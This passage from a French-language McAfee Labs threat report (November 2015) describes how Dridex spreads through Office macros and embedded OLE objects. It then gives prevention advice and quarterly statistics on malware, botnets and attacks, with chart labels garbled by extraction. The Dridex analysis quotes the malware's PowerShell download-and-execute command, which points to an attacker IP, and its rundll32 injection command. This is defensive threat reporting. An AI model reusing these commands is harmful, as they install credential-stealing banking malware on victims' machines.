Points marquants
Comportement de Dridex
Dans le cas de Dridex, le document joint peut arriver sous la forme de
deux variantes :
■■
La première variante prend la forme d'un document XML (.xml ou .doc)
contenant un objet Office incorporé chiffré en Base64, qui est déchiffré
et exécuté à l'ouverture du fichier XML. L'objet ActiveMime incorporé
contient un document OLE chiffré qui est déchiffré et exécuté juste après
l'ouverture de l'objet Office par le fichier XML. Le fichier OLE exécute
ensuite une macro malveillante incorporée contenant du code semblable
à l'illustration suivante :
Ce code exécute PowerShell et télécharge le chargeur de Dridex.
■■
La seconde variante prend la forme d'un document Word ou Excel
contenant un objet actif Office qui exécute le code malveillant dans
le fichier OLE en tant que code OLE natif.
Les auteurs de logiciels malveillants diffusés par macro sont rusés : même si
l'utilisateur n'a pas activé l'exécution des macros, le logiciel malveillant peut
être exécuté en lançant le code malveillant directement à partir du fichier OLE.
Pour tromper l'utilisateur, le logiciel malveillant présente un fichier document
contenant un objet actif incorporé.
Partager ce rapport
Points marquants
Les utilisateurs reçoivent un avertissement concernant l'ouverture d'objets actifs malveillants,
semblable à l'avertissement affiché lorsqu'ils tentent d'ouvrir un document contenant une
macro incorporée.
Un utilisateur négligent peut ouvrir l'objet actif incorporé en ignorant l'avertissement
et en double-cliquant sur l'objet malveillant. Dans ce cas, le code du programme de
téléchargement s'exécute en lançant une instance PowerShell, comme c'est le cas
pour la variante précédente.
Dans les deux cas, le code malveillant incorporé exécute une instruction de ligne
de commande qui exécute powershell.exe avec les paramètres suivants :
■■
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object
System.Net.WebClient).DownloadFile('hxxp:// 62.xx.xx.15 /asalt/assa.
exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab
%TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
Partager ce rapport
Points marquants
Le code précédent s'exécute uniquement si PowerShell est installé. Après avoir
exécuté ce code, le logiciel malveillant télécharge et exécute le chargeur Dridex,
qui télécharge et installe la DLL Dridex, qui est injectée dans explorer.exe en
exécutant la commande suivante :
■■
rundll32.exe "C:\XX.tmp" NotifierInit
Après l'exécution de cette commande, Dridex s'installe sur le système, rundll.exe
est arrêté et le système est infecté. Le logiciel malveillant contacte ensuite son ou
ses serveurs de contrôle pour signaler l'infection. Dridex est un logiciel malveillant
bancaire capable de dérober les informations d'identification pour les comptes
en ligne ; il est dérivé de Cridex. Ces deux logiciels appartiennent à la famille de
logiciels malveillants GameOver Zeus. (Cliquez ici pour en savoir plus sur Dridex.)
Récemment, McAfee Labs a également découvert des attaques basées sur des
macros qui propagent le malware de point de vente Evoltin. Celui-ci vole le nom
de l'ordinateur, le GUID et d'autres informations sur les cartes bancaires, puis
transmet ces données au serveur distant via une requête HTTP POST.
(Cliquez ici pour en savoir plus sur Evoltin.)
Conclusion
Bien que l'utilisation de macros pour diffuser des logiciels malveillants soit une
technique ancienne, les macros malveillantes actuelles ont gagné en efficacité
et flexibilité en exploitant des fonctionnalités telles que PowerShell. Les auteurs
de malware ont depuis longtemps adopté les macros pour leur simplicité, leur
facilité de programmation ainsi que d'autres fonctionnalités pour attaquer les
victimes et propager les logiciels malveillants. Ils utilisent régulièrement les
techniques d'ingénierie sociale pour infecter un grand nombre d'utilisateurs.
En général, il n'est pas nécessaire d'activer les macros pour afficher le contenu
d'un document. Si vous recevez un document qui vous invite à activer une macro,
soyez prudent. Ces ruses peuvent facilement être contrées en restant vigilant.
Prévention
Pour protéger les utilisateurs contre les logiciels malveillants diffusés par macro,
il est essentiel de les informer de l'existence de ce type de malware ainsi que de
ses modes de propagation. Une formation régulière des utilisateurs permettra de
les sensibiliser au problème.
De plus, diverses mesures peuvent être mises en œuvre par les utilisateurs et les
entreprises pour accroître la protection. Adoptez le niveau de sécurité requis pour
chaque application. Par exemple, il est peu probable que PowerPoint utilise des
macros ; les utilisateurs peuvent donc désactiver cette fonctionnalité. Les serveurs
de messagerie et les analyseurs antivirus peuvent être configurés pour analyser
le trafic de messagerie et filtrer les pièces jointes contenant des macros,
éventuellement en envoyant un message d'avertissement au destinataire.
Points marquants
McAfee Labs recommande les mesures suivantes pour lutter contre les attaques
de logiciels malveillants diffusés par macro :
Découvrez comment Intel
Security peut vous aider à vous
protéger contre cette menace.
■■
■■
■■
■■
■■
■■
■■
■■
■■
■■
■■
Activez les mises à jour automatiques de vos systèmes d'exploitation
ou téléchargez-les régulièrement afin de bénéficier en permanence des
derniers correctifs pour les vulnérabilités connues.
Configurez votre logiciel antimalware pour qu'il analyse automatiquement
tous les fichiers joints aux e-mails et aux messages instantanés.
Vérifiez que l'ouverture des pièces jointes n'est pas automatique dans
vos programmes de messagerie, pas plus que l'affichage des images.
Assurez-vous par ailleurs que le volet d'aperçu est désactivé.
Configurez les paramètres de sécurité du navigateur à un niveau moyen
ou élevé.
Soyez très prudent lorsque vous ouvrez des pièces jointes, surtout
celles portant l'extension .doc ou .xls.
N'ouvrez jamais des e-mails non sollicités ou des fichiers joints
que vous n'attendez pas, même s'ils proviennent de personnes
que vous connaissez.
Méfiez-vous du spam, susceptible de masquer des tentatives de
phishing. Ne cliquez pas sur les liens figurant dans les e-mails ou
les messages instantanés.
Établissez une surveillance réseau permettant d'identifier les requêtes
ping inattendues envoyées par les ordinateurs internes aux adresses IP
telles que 1.3.1.2 ou 2.2.1.1, etc.
Sachez que les reçus ou les documents de facturation ne nécessitent
généralement pas des macros.
Utilisez une suite Microsoft Office à jour pour bénéficier d'une meilleure
protection contre ces types d'attaques.
Soyez prudent lorsque vous manipulez des documents vides qui invitent
les utilisateurs à activer les macros pour afficher le contenu du document.
Assurez-vous que le paramètre de sécurité des macros par défaut est
défini sur Élevé sur tous les produits Office.
Pour découvrir comment les produits Intel Security détectent les logiciels
malveillants diffusés par macro, cliquez ici.
Partager ce rapport
Menaces ciblant les
équipements mobiles
Logiciels malveillants
Menaces web
Attaques réseau
Donner votre avis
Menaces ciblant les équipements mobiles
Nouveaux
malveillants
sur
mobiles
Nouveauxlogiciels
logiciels malveillants
sur
mobiles
1 400 000
Le nombre de nouveaux
échantillons de logiciels
malveillants sur mobiles continue
de croître. Les infections ont
également augmenté, mais
pas au même rythme, grâce
au renforcement des défenses
des systèmes d'exploitation.
L'augmentation du nombre
d'échantillons reflète sans
doute les efforts des attaquants
qui souhaitent contourner
ces défenses.
1 200 000
1 000 000
800 000
600 000
400 000
200 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Nombre
total
malveillants
mobiles
Nombre
totalde
delogiciels
sursur
mobiles
10 000 000
9 000 000
8 000 000
7 000 000
6 000 000
5 000 000
4 000 000
3 000 000
2 000 000
1 000 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Partager ce rapport
Taux d'infection par des logiciels malveillants
sur mobiles par région
(3e trimestre 2015)
14 %
12 %
10 %
8%
6%
4%
2%
0
Afrique
Asie
Australie
Europe
Amérique
du Nord
Amérique
du Sud
Taux d'infection par des logiciels malveillants
sur mobiles au niveau mondial
22 %
20 %
18 %
16 %
14 %
12 %
10 %
8%
6%
4%
2%
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Partager ce rapport
Logiciels malveillants
Nouveaux
malveillants
Nouveaux logiciels
50 000 000
La collection de nouveaux logiciels
malveillants de McAfee Labs
a reculé de 4 % ce trimestre,
probablement en raison du
nombre extrêmement variable
de parasites.
45 000 000
40 000 000
35 000 000
30 000 000
25 000 000
20 000 000
15 000 000
10 000 000
5 000 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim
2014
4e trim.
1er trim.
2e trim.
2015
3e trim
Nombre
logicielsmalveillants
malveillants
Nombretotal
total de
de logiciels
500 000 000
La progression implacable des
logiciels malveillants continue.
Nous nous attendons à dépasser
la barre du demi-milliard
d'échantillons d'ici à la fin 2015.
450 000 000
400 000 000
350 000 000
300 000 000
250 000 000
200 000 000
150 000 000
100 000 000
50 000 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Partager ce rapport
Nouveaux
rootkits
Nouveaux rootkits
100 000
Le nombre de nouveaux rootkits
a chuté de 65 %, atteignant ainsi
son niveau le plus bas depuis
2008. Ce déclin est probablement
dû à une chute de la rentabilité
des attaques. Dans la version
64 bits de Windows, Microsoft
met en œuvre la signature
obligatoire des pilotes et inclut
PatchGuard, qui complique
considérablement le piratage
du noyau. Le pic enregistré aux
1er et 2e trimestres 2014 était dû
à une seule famille de rootkits
qui semble être arrivée en bout
de course.
90 000
80 000
70 000
60 000
50 000
40 000
30 000
20 000
10 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Nombre
derootkits
rootkits
Nombre total
total de
1 800 000
1 600 000
1 400 000
1 200 000
1 000 000
800 000
600 000
400 000
200 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Partager ce rapport
NouveauxNouveaux
logicielslogiciels
de demande
de rançon
(ransomware)
de demande
de rançon
1 400 000
Le nombre de nouveaux
échantillons de logiciels de
demande de rançon a chuté
de 40 % au 3e trimestre. Le pic
enregistré au 2e trimestre était
dû à Virus.Win32.PolyRansom.f,
une famille de ransomware
parasite qui fausse les chiffres
en raison de la création rapide
de nouvelles variantes.
1 200 000
1 000 000
800 000
600 000
400 000
200 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Nombre total
de logiciels
de demande
de rançon
(ransomware)
Nombre
total de logiciels
de demande
de rançon
5 500 000
5 000 000
4 500 000
4 000 000
3 500 000
3 000 000
2 500 000
2 000 000
1 500 000
1 000 000
500 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Partager ce rapport
Nouveaux
malveillants
signés
Nouveauxfichiers
fichiers binaires
binaires signés
malveillants
2 500 000
Le nombre de nouveaux fichiers
binaires malveillants signés
a baissé de 26 % au 3e trimestre
et représente seulement la moitié
des échantillons collectés au
2e trimestre 2014.
2 250 000
2 000 000
1 750 000
1 500 000
1 250 000
1 000 000
750 000
500 000
250 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Nombre
total
binairessignés
malveillants
signés
Nombre
totalde
defichiers
fichiers binaires
malveillants
20 000 000
17 500 000
15 000 000
12 500 000
10 000 000
7 500 000
5 000 000
2 500 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Partager ce rapport
Nouveaux
malveillants
pour
Mac OS
Nouveauxlogiciels
pour
Mac
OS
30 000
Les auteurs de logiciels
malveillants s'intéressent de plus
en plus à la plate-forme Mac.
À compter de ce rapport, nous
commençons à comptabiliser les
logiciels malveillants qui ciblent
Mac OS. Au 3e trimestre, nous
avons enregistré quatre fois plus
de malware visant Mac OS qu'au
2e trimestre. Cette augmentation
est essentiellement due à une
seule menace.
25 000
20 000
15 000
10 000
5 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Nombre
total
malveillants
pour
Nombre
totalde
delogiciels
pour
MacMac OS
OS
60 000
55 000
50 000
45 000
40 000
35 000
30 000
25 000
20 000
15 000
10 000
5 000
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Partager ce rapport
Menaces web
Nouvelles
URLsuspectes
suspectes
Nouvelles URL
35 000 000
30 000 000
25 000 000
20 000 000
15 000 000
10 000 000
5 000 000
0
4e trim.
2013
1er trim.
URL
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Domaines associés
Nouvelles
URLde
dephishing
phishing
Nouvelles URL
2 500 000
2 250 000
2 000 000
1 750 000
1 500 000
1 250 000
1 000 000
750 000
500 000
250 000
0
4e trim.
2013
URL
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Domaines associés
Partager ce rapport
Nouvelles
URLde
despam
spam
Nouvelles URL
2 500 000
2 000 000
1 500 000
1 000 000
500 000
0
4e trim.
2013
1er trim.
URL
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Domaines associés
Volume de spam et d'e-mails dans le monde
(en milliers de milliards de messages)
11,0
10,0
9,0
8,0
7,0
6,0
5,0
4,0
3,0
2,0
1,0
0
4e trim.
2013
Spam
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
E-mails légitimes
Partager ce rapport
E-mails de spam émanant des 10 principaux
réseaux de robots (botnets)
(en millions de messages)
Kelihos, qui offre des produits de
grande distribution et des produits
pharmaceutiques de contrefaçon,
retrouve la première place du
classement des réseaux de robots
de spam après une période
d'inactivité de deux trimestres.
Bien que le volume de spam
émanant de réseaux de robots
reste bas par rapport à 2014,
ce volume a légèrement augmenté
au 3e trimestre, à la suite
d'améliorations incrémentielles
apportées par McAfee Labs
à ses outils de télémétrie.
1 400
1 200
1 000
800
600
400
200
0
4e trim.
2013
1er trim.
2e trim.
3e trim.
2014
4e trim.
Kelihos
Darkmailer
Dyre
Slenfbot
Cutwail
Lethic
Gamut
Asprox
Stealrat
1er trim.
2e trim.
2015
3e trim.
Autres
Prévalence des réseaux de robots (botnets) dans le monde
Prévalence des réseaux de robots (botnets) dans le monde
(3e trimestre 2015)
Wapomi se propage sous la forme
d'un ver et infecte les fichiers .exe.
Il tente également de télécharger
d'autres fichiers qui créent une
attaque par déni de service
distribué. Cette propagation
fréquente explique sa popularité ;
cependant, un grand nombre
des serveurs de contrôle qu'il
nécessite ont déjà été rendus
inaccessibles par des sinkholes.
Wapomi
Muieblackcat
21 %
29 %
2%
Sality
Ramnit
3%
Maazben
4%
5%
14 %
8%
12 %
Darkness
NGRBot
H-Worm
Autres
Partager ce rapport
Principaux
pays hébergeant
des serveurs
Principaux
pays hébergeant
des serveurs
de contrôle
de réseaux
de robots
de contrôle
de réseaux
de robots
(3e trimestre 2015)
États-Unis
Chine
Allemagne
26 %
Brésil
38 %
Russie
6%
Pays-Bas
Corée du Sud
5%
4%4% 4%
4%
5%
Algérie
France
Autres
Attaques réseau
Principales attaques réseaux
Principales attaques réseau
(3e trimestre 2015)
Déni de service
Navigateur
19 %
1%
2%
2%
30 %
Attaque en force
SSL
2%
Balayage
5%
16 %
Réseau de robots
(botnet)
23 %
Shellshock
Porte dérobée
(backdoor)
Autres
Partager ce rapport
À propos d'Intel Security
Commentaires et suggestions
Pour nous aider à améliorer encore
les prochaines éditions de ce
rapport, nous aimerions connaître
votre opinion. Si vous souhaitez
nous faire part de vos impressions,
cliquez ici pour participer à une
petite enquête sur nos rapports.
Elle ne vous prendra pas plus de
cinq minutes.
McAfee fait désormais partie d'Intel Security. Avec sa stratégie Security
Connected, son approche innovante de la sécurité optimisée par le matériel et
son réseau mondial de cyberveille sur les menaces Global Threat Intelligence,
Intel Security met tout en œuvre pour proposer des solutions et des services de
sécurité proactifs et éprouvés, qui assurent la protection des systèmes, réseaux
et équipements mobiles des entreprises et des particuliers du monde entier.
Intel Security associe le savoir-faire et l'expérience de McAfee aux innovations
et aux performances reconnues d'Intel pour faire de la sécurité un élément
essentiel de chaque architecture et plate-forme informatique. La mission d'Intel
Security est de permettre à chacun de vivre et de travailler en toute confiance et
en toute sécurité dans le monde numérique.
www.intelsecurity.com
Suivre McAfee Labs
McAfee. Part of Intel Security.
Tour Pacific
13, Cours Valmy - La Défense 7
92800 Puteaux
France
+33 1 47 62 56 09 (standard)
www.intelsecurity.com
Les renseignements contenus dans le présent document ne sont fournis qu'à titre informatif, au bénéfice des clients de
McAfee. Les informations présentées ici peuvent faire l’objet de modifications sans préavis et sont fournies sans garantie
ni représentation quant à leur exactitude ou à leur adéquation à une situation ou à des circonstances spécifiques.
Intel et les logos Intel et McAfee sont des marques commerciales d'Intel Corporation ou de McAfee, Inc. aux États-Unis
et/ou dans d'autres pays. Les autres noms et marques sont la propriété de leurs détenteurs respectifs.
Copyright © 2015 Intel Corporation. 62189rpt_nov-threats_1215

Rapport de McAfee Labs sur le paysage des menaces Novembre

Transcription

Documents pareils

Service Expert en ligne d`Aliant

viv3 labs : une pilule qui a du mal à passer

Installation de McAfee Entreprise ULB sur un MAC

Aide évoluée en ligne

Guide pour des achats en ligne en toute sécurité

Contexte macroéconomique et de marché express Indicateurs de taux

TriM 2016 – Hattrick pour l`Europe

Date : Fiche d`inscription « B-BOYS DAY 2016 Anniversary

McAfee Total Protection 2013